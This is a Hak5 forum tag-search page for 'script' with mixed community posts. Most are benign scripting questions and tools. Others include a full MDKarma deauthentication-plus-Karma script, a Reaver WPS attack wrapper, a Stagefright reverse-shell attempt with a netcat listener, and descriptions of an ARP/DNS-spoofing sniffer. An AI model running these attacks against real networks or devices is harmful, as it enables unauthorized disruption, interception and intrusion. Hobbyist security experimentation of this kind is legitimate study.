Jump to content

Search the Community

Showing results for tags 'script'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P
  2. Greetings everyone, I'm not from the Hak5 team but I wanted to share my work. I've made a small command line tool that can convert any plain/text file into a ducky script. I didn't know if this type of tool already exists so I created mine. Tool capabilities : Convert any file plain/text file (no matter it's size). Append commands after each lines More will come soon. Please note that this tool is "Open Source" you can download it from github, it's written in Pascal (see link below). For the moment this tool can only be executed on Windows. If you want to run it on a Linux system you can still use Wine until a new version is released. Tool in action : 1. Choose a plain/text file (no matter it's extension) This file will be converted into a ducky script ! 2. Run the tool with the following parameters (DSC -i myfile.dat -a DELAY 100,ENTER) 3. This file will be converted and the tool will create a new one (myfile.dat.dsc) with the following content STRING This file DELAY 100 ENTER STRING will be DELAY 100 ENTER STRING converted into DELAY 100 ENTER STRING a ducky script ! DELAY 100 ENTER This can be useful if you have a long script to write, like a VBScript or whatever. GitHub link : https://github.com/CDevCom/DuckyStringConverter Best regards, CDevCom.
  3. I wrote a few shell (bash?) scripts to simplify some of my tasks in my Kali and Ubuntu Live discs. These were saved as .sh files that could be run when I double-clicked them. I am in the process of writing others for other repetitive tasks Now that I have updated to Kali 2.0, I cannot run these by double-clicking them. Setting them to run in "Run application" returns a message that says: "unable to locate program" I have just written a program called script.sh: #!/bin/bash/ echo "Hello World" And this one has the same difficulties. They all run in terminal with "sh script.sh", but that defeats their simplicity. The same problem happens in Kali and Ubuntu, so I don't think it is a Kali 2.0 issue, but it is the first place I noticed the issue. Permissions are set to run as programs, and the properties tab is checked for "Allow executing file as a program."
  4. Hello everyone, I am Cr0wTom and I recently posted in my channel a video about how to implement rubber ducky scripts in a vulnerable to BadUSB, USB thumb drive. I think that you will appreciate it here. I will be happy to hear your responce, here or in my videos commends. Feel free to subscribe :) Video Link: Thank you for watching!! (More videos to come)
  5. Connect Version 1.1 Features Connects to networks with the strongest signal Save preferred networks with -W option (Open and password protected) Add commands to be run by the pineapple after the script completes. Upon successful connection, failed connection or both run specified commands Macchanger support Upon connection, start karma (PineAP not yet supported) Prevent connection to certain access points with blacklists Check Internet connection status with -s Monitor internet connection status with -m and specify how many failed attempts to retry. 0 = infinite Auto retry tries to connect to an access point if the connection fails. Use -a and specify the retry amount Internet connection monitoring pings a few times every 30 seconds. After 5 successful ping attempts, connection testing occurs every 5 minutes. After 3 more successful ping attempts, connection testing occurs every 10 minutes. If pings fail the access point is disconnected, temporarily blacklisted and a new access point is located. After 3 failed attempts to connect to a new access point, the temporary blacklist is removed and the pineapple reconnects to the original access point. Note: Only open access points and whitelisted access points work with internet connection monitoring. Commands can now be added therough the infusion. Use -C to add commands. Script variables can also be passed to commands to be run. Possible variables that can be passed: "$ESSID" "$PASSWORD" "$PWD" "$WIFI_BSSID" "$WIFI_CHANNEL" "$WIFI_INT" To add an access point to the whitelist after a successful connection use: pineapple infusion connect -w "$ESSID" -p "$PASSWORD" Usage pineapple infusion connect [-BRWckrs] [-i Interface] [-e ESSID] [-p Password] [-t Interface] [-b SSID] [-w SSID]... OPTIONS: -B Backup /etc/config/wireless -C Add commands to be run upon successful, failed or all connections -R Restore /etc/config/wireless from backup -W Checks for and connects to networks specified in the whitelist -c Run commands specified in commands.txt upon successful connection -k Start Karma -r Random MAC -s Check internet connection status. -a num Auto retry. Specify how many failed attempts to try to connect -e essid ESSID of target wifi -i iface Interface. Default wlan1 -m num Monitor connection and reconnect. Specify how many failed attempts to retry. 0=infinite -p pass Wifi Password -t iface To interface for ICS. From interface is specified with -i -b essid Blacklists AP by SSID. Scans with first available interface if no interface is specified -w essid Whitelists AP by SSID. Prompts for password when required. Password can also be set with -p Future plans Disconnect from access point Bug fixes and general optimizations Connection monitoring with -e If you encounter any errors please report them here. Also feature requests or improvement suggestions are always welcome! If you would like to use parts of this script for a script or infusion of your own, contact me by a PM. -SymPak
  6. Hello guys I wrote a very simple script where u cant past your ascii art into a notepad. In case u dont know what ascii is its something like : _______ _ |__ __| | | | | ___ ___| |_ | |/ _ \/ __| __| | | __/\__ \ |_ |_|\___||___/\__| U can generate your art from : http://patorjk.com/software/taag/#p=display&f=Big&t=%0A So lets get started REM So first we are going to open notepad DELAY 1000 GUI r DELAY 300 STRING notepad ENTER DELAY 300 REM now insert the ascii text bij pasting in into your script.txt and add STRING and ENTER to every part of it. REM for example STRING ENTER _______ _ STRING |__ __| | | ENTER | | ___ ___| |_ STRING | |/ _ \/ __| __| ENTER | | __/\__ \ |_ STRING |_|\___||___/\__| ENTER REM please comment if you like or if i did something wrong it its my first simple script. REM u can change the DELAY to what you like :) So thats it, i hope u guys liked it :D The only thing u need to do is change it to a injection.bin I actually dont own a rubber ducky so im not able to test it but it should work :D Seeya,
  7. The Duckuino I recently learned that the Arduino Leonardo and the Arduino Micro are both capable of pressing keys as an HID. Instantly I thought of USB Rubber Ducky and Duckyscript. I had some spare time, so I decided to write this, Duckuino, a simple Duckyscript to Arduino converter. It's not very pretty, but it seems to be reliable. Features: Convert Duckyscript to Arduino(Duh!) Basic program memory storage(works better with large programs than traditional SRAM) Arduino code and Duckyscript combo! (fairly buggy in some places) What was that about Arduino code alongside Duckyscript? Due to the nature of the converter, quite a bit of Arduino code can be programmed inside the Duckyscript before conversion. This is useful for things the program doesn't auto-add such as loops and if statements. Known bugs: Letters may occasionally get offsetted For some reason the usage of 'CTRL C' doesn't work but 'CTRL c' does... Examples: Input: DELAY 100 STRING Hello world! I am Duckuino! ENTER CTRL ALT DELETE Output: void setup() { Keyboard.begin(); delay(100); print(F("Hello world! I am Duckuino!")); type(KEY_RETURN); press(KEY_LEFT_CTRL); press(KEY_LEFT_ALT); press(KEY_DELETE); Keyboard.releaseAll(); Keyboard.end(); } void type(int key) { Keyboard.press(key); Keyboard.release(key); } void print(const __FlashStringHelper *value) { Keyboard.print(value); } void loop(){} IMPORTANT NOTE: I am not responsible for anything evil you do or generate with this. Also, this program will only work on Arduinos that support the keyboard library. I'm not the best at Duckyscript so I apologize if I've missed any commands or functions, feel free to contribute and/or download here: https://github.com/Plazmaz/Duckuino If you've made something cool with Duckuino, I'd love to hear about it, send me a PM or post a reply! EDIT: Almost forgot to give credit to http://ctrlaltnarwhal.wordpress.com/2012/10/31/installing-usb-rubber-ducky-on-3rd-party-devices/ for the idea!
  8. I've been playing around with the idea of the possibiliity of one ducky script + batch/bash script to rule them all This is a batch/bash part Filename: autorun.bat #!/bin/bash goto :next # ENTER LINUX CODE HERE!!!!!!! echo 'This is the linux part of the script' if [ -n "$(which lsb_release)" ]; then lsb_release -d | sed 's~^Description:\t\(.*\)~\1~g'; fi # EOF LINUX exit 0 :next @echo off REM wine doesnt understand FINDSTR, REM where as windows does echo "YES" | FINDSTR /L "NO" > NUL IF %ERRORLEVEL% EQU 0 goto :wine SET OSVersion=Unknown VER | FINDSTR /L "5.0" > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=2000 VER | FINDSTR /L "5.1." > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=XP VER | FINDSTR /L "5.2." > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=2003 VER | FINDSTR /L "6.0." > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=Vista VER | FINDSTR /L "6.1." > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=7 VER | FINDSTR /L "6.2." > NUL IF %ERRORLEVEL% EQU 0 SET OSVersion=8 REM ENTER WINDOWS CODE HERE!!!!!!! echo This is the windows part of the script IF %OSVersion%==Unknown ( ECHO Unable to determine your version of Windows. ) ELSE ( ECHO You appear to be using Windows %OSVersion% ) ECHO. PAUSE REM EOF WINDOWS exit 0 :wine REM ENTER WINE CODE HERE!!!!!!! echo This is the wine part of the script ECHO You appear to be using Wine REM EOF WINE exit 0
  9. What is FruityCracker? FruityCracker is a bash script that can crack wireless networks , capture wpa handshakes , Evil twin (Open,Wep,Wpa,Wpa2 ) and more features to come ! Compatibility Tested Configuration: Pineapple MK5 1.0.4 Questions or Problems Please Let me know what you would like to see in this script below ! Release Date Unknown. Author : Jesse Izeboud Other scripts i made : FruitySniffer
  10. Hey guys. So I'm creating an auto-run USB Drive for the guys in my shop to further help automate the update/re-image process. I'm a little rusty on my VB. Here's my code in it's current state: x=MsgBox("Do not be afraid, vital software update is in progress. Please direct any errors to your System Administrator",0, "Derek's Auto Update") Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "C:\updates\Firefox Setup Stub 25.0.1" d=MsgBox("Is the Firefox installation Complete",4, "I have a question for you.") if d=vbYes then e=MsgBox("Please download the installer from http://mozilla.org",,"I'm sorry...") else f=MsgBox("Excellent. Please click OK for the next installer.",, "Success!") End If PAUSE Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "C:\updates\lenovographics.exe" PAUSE a=MsgBox("Was there any errors during this update?",4, "I have a question for you.") if a=vbYes then b=MsgBox("Please send a detailed message to admin@work.com of any errors that occured",, "I'm sorry...") else c=MsgBox("Excellent. Thank you for your participation and cooperation.",, "Success!") End If My ultimate goal is this: I'm not sure of the syntax to do this, but I'd like to keep the installer files on the USB drive rather than having to copy them over to the C:\ drive then run the installer. I'm wanting to have this all fully automated. Once the user completes an installation (for example: Firefox), have a MsgBox pop up "did it complete?" If yes = open method z = next installer. The idea to have it all a nested IF/THEN. Any advice is always appreciated. Thanks gang!
  11. Description FruitySniffer is a bash script that automates sniffing on a network. Compatibility Tested Configuration: Pineapple MK5 1.0.4 | Kali Linux Let me know what configuration worked for you! Setting up the Script: Download the Installer.sh file here *UPDATED Scp the file into the /sd or /usb directory on your pineapple (I recommend WinSCP ) Then SSH into the pineapple by using putty or terminal on linux or a ssh terminal app on the chrome webstore i recommend this one Login with your credentials and then cd to /sd or /usb depends on where you have saved it. When you're in the directory where you saved the Installer.sh file type " bash Installer.sh" or use "chmod +x Installer.sh " and then "./Installer.sh" You will be prompted if you want to install on USB or SD type in capitals where you want to save and hit enter. When done cd to /sd/FruitySniffer/ or /usb/FruitySniffer/ When in the directory type " ./FruitySniffer.sh " And your ready to go! The above doesnt work right now but its fixed in the update alpha v1.1 Download FruitySniffer.zip *UPDATED scp FruitySniffer.zip into the location where you want to install FruitySniffer ssh into the pineapple and Install unzip by typing "opkg update" and then "opkg install unzip" then cd into the directory where you placed FruitySniffer.zip then type unzip FruitySniffer.zip type cd FruitySniffer type chmod +x FruitySniffer.sh type ./FruitySniffer.sh Done! Dependencies Installation: If you followed the instructions above then you see the FruitySniffer main menu and there is an option install dependencies . Choose that option and it will install and download the dependencies! Functions: Arspoofing Dns Spoofing Ettercap Sniffing (Mails,Messages,URL's,Files) Sniffing (Passwords HTTPS(SSL + HTTP ,FTP ,IMAP , SMTP and much more) Dsniff TCPDump Questions or Problems Google Code: https://code.google.com/p/fruitysniffer Bug Submission: https://code.google.com/p/fruitysniffer/issues/entry Questions: Feel free to ask! Download Download : Installer.sh *UPDATED This a Alpha version so if you have problems then you can post them here or on the Google Code page. If you have functions that you want to see added to FruitySniffer then post them below i would love to hear the ideas you guys have! Made by Jesse Izeboud Changelog Fixed issue with installation download again if you had problems installing! Fixed Line 35 issue and few others! Fixed corrupt FruitySniffer.zip file for most people! Added another installation option! Fixed install dependencies bug ! Updates Alpha v1.1 - Bug Fixes + Fixed Installer - Release date "Unknown" Source Code http://pastebin.com/TFbUht5L
  12. Hey gang! Wanted to share this cool little script I ran into for updating your Facebook Status with Bash! B) For Linux and (Get ready) Mac OS X http://360percents.com/posts/bash-script-to-update-facebook-status-linux-mac-os-x/
  13. Description: This a a very simple and minimalistic infusion that allows for a script-managed wireless connection for connection sharing. Although I did like the feature set of WifiManager, I personally prefer a more minimalist and script-based approach. This infusion provides network status information as well as an interface to manage the script. Note: When adjusting the variables in the wireless script, maintain the quotation formatting! This is required for the script to function correctly. Feature Set: Script Editor: A basic text editor that allows for editing of the script on the fly. Status Monitor: Outputs important information on your network connection to the small and large tiles. Including: iwconfig, ifconfig, and ping. Example Output: 802.11bg ESSID:"MyGuest" wlan1 2.437 GHz Access Point: AE:22:0A:32:34:F9 Quality=70/70 Signal level=-4 dBm Link PING google.com ( 56 data bytes 64 bytes from 17.938 Auto Refresh Enable/Disable and Logging in Small Tile AutoStart Enjoy!
  14. Whats the best way to save live streaming video to a website or HD? I want my website to d/l shows from ITV and CH-4, live feeds like the Superbowl, converted to mpg4. I used flashget to d/l streams from opencourseware sites before. VLC? Get_iplayer?
  15. Would this be possible? I can see how it would be, but i just wanted to see if one of the DEV's could confirm the complexity of it. It seems simple enough, i think... Find and run the commands that the HTML/JS ui calls, wait till it executes correctly and exits, then execute the next module fetch/get command, wait till completion, so on so forth. For my purposes, a simple static script would work fine. But it would be nice if it could somehow parse a list of availible modules, their install scripts/commands, etc and then prompt the user to choose which modules they want, and then the user waits, presto. If someone could just point me in the right direction and/or get me started, i could in theory have it done fairly quickly ThunderMoose
  16. Hey guys! I am currently making a script that basically : -Asks for a MAC to avoid. -Asks how long to deauth for -Asks what interface to deauth on -Disables karma -Puts wlan0 into RFMON (Monitor Mode) -Starts MDK3 Deauthing for x amount of seconds inputted at the beginning -After x amount of seconds, Stops MDK3 -Removes mon0 -Starts karma again The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :) Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to the new code with the existing script you have... ***Module Development and further script development*** As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibiltiy such as being able to edit the scripts to suit your needs without SSH'in into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :).... -------------------------------------------------------------------------------------------------------------------------------------- Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :) Edit : Version 1.2.3 - Added Whitelisiting. Please give some feedback and any improvements :) Code : #!/bin/bash #Part of the Pineapple Mojito Framework #Made by Foxtrot #Version 1.2.3 #Intro echo "!! This script is to be used only for legal, safe and authorised uses !!" echo "MDKarma V1.2.3" sleep 6 #Ask how long to deauth for echo -n "How long (In Seconds) to deauth for? : "; read deauthTime #Ask what Interface echo -n "What interface would you like to deauth on? : "; read deauthInterface #Ask if you want to whitelist read -r -p "Do you want to add a whitelist? [Y/n] " response if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]] then echo " " echo "Whitelist Created!" echo " " touch whitelist.txt read -r -p "MAC Address to add : " macaddr echo $macaddr >> whitelist.txt else echo " " echo "Avoiding Whitelist Creation!" echo " " fi #Put wlan0 up echo "Checking Interface wlan0 is up...." wifi sleep 3 #Stop Karma echo " " echo "Killing Karma...." hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null sleep 3 #Put deauthInterface into monitor mode echo " " echo "Putting $deauthInterface into monitor mode...." airmon-ng start $deauthInterface > /dev/null sleep 3 #Start deauthing with MDK3 and stop echo " " echo "Deauthing Access Points with MDK3...." mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3 sleep 3 #Kill airmon-ng and start Karma again. echo "Removing mon0 and enabling karma...." airmon-ng stop mon0 > /dev/null wifi hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null sleep 3 #Finish echo " " echo "MDKarma Finished!" -Foxtrot
  17. I have scanned for vulnerabilities with nessus, and i found this (PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow). So i went to the www.exploit-db.com/exploits/19231/ where it is Exploit Code written in python, i tried to use it with metasploit+armitage. But i don't know how to load the script in the existing database on my pc, i am using windows 7, and the "victim" is not on local network, i am new to this so i need some help. Also i am asking for some tutorials, or useful links where can i learn new things.
  18. I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple. Just save the below to a file and execute #!/bin/bash clear echo "This script makes it easy to start a reaver attack" echo "" echo "[+] Do you need to setup a monitor interface? [y/n]" read setup if [[ $setup == 'y' ]]; then #Setup the monitor interface echo "[+] What Wireless interfaces do we have..." iwconfig echo "[+] Please select an interface to place into Monitor Mode [wlan0]" read interface if [[ $interface == '' ]]; then interface=wlan0 #Default to wlan0 fi echo "[+] Starting monitor Mode for $interface" airmon-ng start $interface iwconfig fi #End Mon Mode Setup Portion #Start part of script that executes regardless echo "[+] What monitor interface should I use? [mon0]" read monInterface if [[ $monInterface == '' ]]; then monInterface=mon0 #Default to mon0 fi #Spoof the Mon Mac echo "[+] MacSpoofing $monInterface" ifconfig $monInterface down macchanger -r $monInterface ifconfig $monInterface up #Check for Targets echo "" echo "[+] ------------------------------------------------------[+]" echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]" echo "[+] ------------------------------------------------------[+]" wash -i $monInterface #Set Reaver Target echo "[+] What is the MAC for the target AP?" read target #Set optional functions reaver #to show the options available in terminal echo "[+] reaver -i $monInterface -b $target" echo "[+] Type any other reaver options you'd like besides the above" read reaverVars #Start REAVERINGGGGG!!!! echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)" reaver -i $monInterface -b $target $reaverVars #Stop Monitor Mode Interface if the script set it up if [[ $setup == 'y' ]]; then echo "" echo "[+] killing Monitor Interface" airmon-ng stop $monInterface fi [/CODE]
  19. Ho can make the iptable entries in to a startup script for jasager? How do I create 2 scripts, one for WAN port routing and 1 for Android USB Tethering? iptables -A FORWARD -i eth1 -o wlan0 -s -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE iptables -A FORWARD -s -o usb0 -j ACCEPT iptables -A FORWARD -d -m state --state ESTABLISHED,RELATED -i usb0 -j ACCEPT iptables -t nat -A POSTROUTING -s -o usb0 -j MASQUERADE Thnks
  • Create New...